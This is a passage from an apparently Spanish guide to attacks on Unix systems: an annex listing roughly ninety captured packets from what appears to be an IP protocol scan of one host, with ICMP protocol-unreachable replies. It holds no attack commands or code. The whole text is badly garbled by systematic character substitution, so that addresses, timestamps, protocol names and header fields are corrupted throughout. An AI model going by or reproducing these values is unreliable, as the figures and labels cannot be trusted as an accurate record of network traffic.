Paquete nro. 3 - Tiempo 0.+(005+ 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D0) ,o7igo:0 De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.( > 19(.16).0.60 e!'o-reque t 0 Paquete nro. + - Tiempo 0.+(0+11 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D00 ,o7igo:0 De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( e!'o-rep"E 0 Paquete nro. 5 - Tiempo 0.)(39+6 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0( 9igmp: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:**

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *50 de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 igmp ; $a> Paquete nro. 6 - Tiempo (.((79(9 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0( 9igmp: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 igmp ; $a> Paquete nro. 7 - Tiempo (.631907 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D03 9ggp: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 ggp Paquete nro. ) - Tiempo (.63(17( 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 9 - Tiempo 3.036036 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0+ 9ipen!ap: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 ipen!ap Paquete nro. 10 - Tiempo 3.036615 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 11 - Tiempo 3.30)557 8P Origen: ** -> ** 8P ?ea7er: =er ion:** Proto:0D** 9**: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; #$P >'o 'a 19(.16).0.(

aE

19(.16).0.60

Paquete nro. 1( - Tiempo 3.30)5)6 8P Origen: ** -> ** 8P ?ea7er: =er ion:** Proto:0D** 9**: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; #$P i at 00:17:31:96:5b:1f Paquete nro. 13 - Tiempo 3.707)1+ 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D05 9 t: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60

aE

19(.16).0.(

t

Paquete nro. 1+ - Tiempo 3.70)1+9 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 15 - Tiempo +.111)77 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D06 9t!p: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.(:535)0 > 19(.16).0.60:535)0 # Paquete nro. 16 - Tiempo +.11((9( 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D06 9t!p: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 8P ; T,P 19(.16).0.60:535)0 > 19(.16).0.(:535)0 $ Paquete nro. 17 - Tiempo +.515)37 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D07 97: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 7

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *J. de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
Paquete nro. 1) - Tiempo +.51613+ 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 19 - Tiempo +.9199++ 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0) 9egp: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 egp Paquete nro. (0 - Tiempo +.9(05+( 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. (1 - Tiempo 5.3(3)17 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D09 9igp: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 igp Paquete nro. (( - Tiempo 5.3(+(0) 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. (3 - Tiempo 5.7(+06( 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0a 910: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 10 Paquete nro. (+ - Tiempo 5.7(+63) 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. (5 - Tiempo 6.1(7)1( 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0b 911: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 11 Paquete nro. (6 - Tiempo 6.1()153 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. (7 - Tiempo 6.531771 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0! 9pup: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 pup Paquete nro. () - Tiempo 6.53((65 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. (9 - Tiempo 6.9+1+(7 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D07 913: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 13

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *J* de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
Paquete nro. 30 - Tiempo 6.9+(((3 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 31 - Tiempo 7.3+371( 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0e 91+: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 1+ Paquete nro. 3( - Tiempo 7.3+3950 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 33 - Tiempo 7.7+7)51 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0f 915: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 15 Paquete nro. 3+ - Tiempo ).151665 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0f 915: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 15 Paquete nro. 35 - Tiempo ).555+)( 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D10 916: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 16 Paquete nro. 36 - Tiempo ).55575+ 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 37 - Tiempo ).95561) 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D11 9u7p: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 8P ; KDP 19(.16).0.(:535)0 > 19(.16).0.60:535)0 Paquete nro. 3) - Tiempo 9.359+70 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D11 9u7p: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 8P ; KDP 19(.16).0.(:535)1 > 19(.16).0.60:535)0 Paquete nro. 39 - Tiempo 9.359665 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:3 De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' 3 ; 8Perror ; KDPerror Paquete nro. +0 - Tiempo 10.763671 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0f 915: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 15 Paquete nro. +1 - Tiempo 10.76+7(1 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *J2 de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
Paquete nro. +( - Tiempo 11.167376 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0( 9igmp: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 igmp ; $a> Paquete nro. +3 - Tiempo 1(.571309 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D0( 9igmp: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 igmp ; $a> Paquete nro. ++ - Tiempo 1(.971++1 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1( 91): 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 1) Paquete nro. +5 - Tiempo 1(.97(059 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. +6 - Tiempo 13.375(06 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D13 919: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 19 Paquete nro. +7 - Tiempo 13.375505 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. +) - Tiempo 13.775305 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1+ 9'mp: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 'mp Paquete nro. +9 - Tiempo 13.775)33 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 50 - Tiempo 1+.1)0+() 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D15 9(1: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (1 Paquete nro. 51 - Tiempo 1+.5)3311 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D15 9(1: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (1 Paquete nro. 5( - Tiempo 1+.5)361) 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 53 - Tiempo 1+.9)7576 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D16 9Dn Ai7p: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 Dn Ai7p Paquete nro. 5+ - Tiempo 15.391115

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *J- de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D16 9Dn Ai7p: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 Dn Ai7p Paquete nro. 55 - Tiempo 15.3915() 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 56 - Tiempo 15.7911+7 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D17 9(3: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (3 Paquete nro. 57 - Tiempo 16.191357 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D17 9(3: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (3 Paquete nro. 5) - Tiempo 16.595(09 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D17 9(3: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (3 Paquete nro. 59 - Tiempo 16.595615 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 60 - Tiempo 16.99901) 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1) 9(+: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (+ Paquete nro. 61 - Tiempo 17.39907( 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1) 9(+: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (+ Paquete nro. 6( - Tiempo 17.399++) 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 63 - Tiempo 17.)0303) 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D19 9(5: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (5 Paquete nro. 6+ - Tiempo 1).(06951 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D19 9(5: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (5 Paquete nro. 65 - Tiempo 1).61116+ 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D19 9(5: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (5 Paquete nro. 66 - Tiempo 1).611509 8P Origen: 19(.16).0.60 -> 19(.16).0.(

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *J1 de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 67 - Tiempo 19.0150+6 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1a 9(6: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (6 Paquete nro. 6) - Tiempo 19.+1)9(( 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1a 9(6: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 (6 Paquete nro. 69 - Tiempo 19.+19173 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 70 - Tiempo 19.)(()6) 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1b 9r7p: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 r7p Paquete nro. 71 - Tiempo (0.(((913 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1b 9r7p: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 r7p Paquete nro. 7( - Tiempo (0.6(6)6+ 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1b 9r7p: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 r7p Paquete nro. 73 - Tiempo (0.6(7(19 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 7+ - Tiempo (1.031009 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1! 9(): 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 () Paquete nro. 75 - Tiempo (1.+3(+0) 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1! 9(): 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 () Paquete nro. 76 - Tiempo (1.+3(666 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 77 - Tiempo (1.)3+716 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D17 9i oAtp+: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 i oAtp+ Paquete nro. 7) - Tiempo ((.(3)7+6 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D17 9i oAtp+: 9...:

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *J5 de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 i oAtp+ Paquete nro. 79 - Tiempo ((.6+(6)+ 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D17 9i oAtp+: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 i oAtp+ Paquete nro. )0 - Tiempo ((.6+301) 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. )1 - Tiempo (3.++6)(+ 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1e 930: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 30 Paquete nro. )( - Tiempo (3.++71++ 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. )3 - Tiempo (+.(50937 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1f 931: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 31 Paquete nro. )+ - Tiempo (5.05+569 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D1f 931: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 31 Paquete nro. )5 - Tiempo (5.05+970 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. )6 - Tiempo (5.6(5777 8P Origen: ** -> ** 8P ?ea7er: =er ion:** Proto:0D** 9**: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; #$P >'o 'a 19(.16).0.(

aE

19(.16).0.60

Paquete nro. )7 - Tiempo (5.6(5)06 8P Origen: ** -> ** 8P ?ea7er: =er ion:** Proto:0D** 9**: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; #$P i at 00:17:31:96:5b:1f

aE

19(.16).0.(

Paquete nro. )) - Tiempo (6.+(65+0 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(0 93(: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:** De !rip!ion: <t'er ; 19(.16).0.( > 19(.16).0.60 3( Paquete nro. )9 - Tiempo (6.+(7110 8P Origen: 19(.16).0.60 -> 19(.16).0.( 8P ?ea7er: =er ion:+2 Proto:0D01 9i!mp: 9...: 8,3P ?ea7er: Tipo:0D03 ,o7igo:( De !rip!ion: <t'er ; 8P ; 8,3P 19(.16).0.60 > 19(.16).0.( 7e t-unrea!' ( ; 8Perror Paquete nro. 90 - Tiempo (7.(3++93 8P Origen: 19(.16).0.( -> 19(.16).0.60 8P ?ea7er: =er ion:+2 Proto:0D(1 933: 9...: 8,3P ?ea7er: Tipo:0D** ,o7igo:**

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *JJ de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
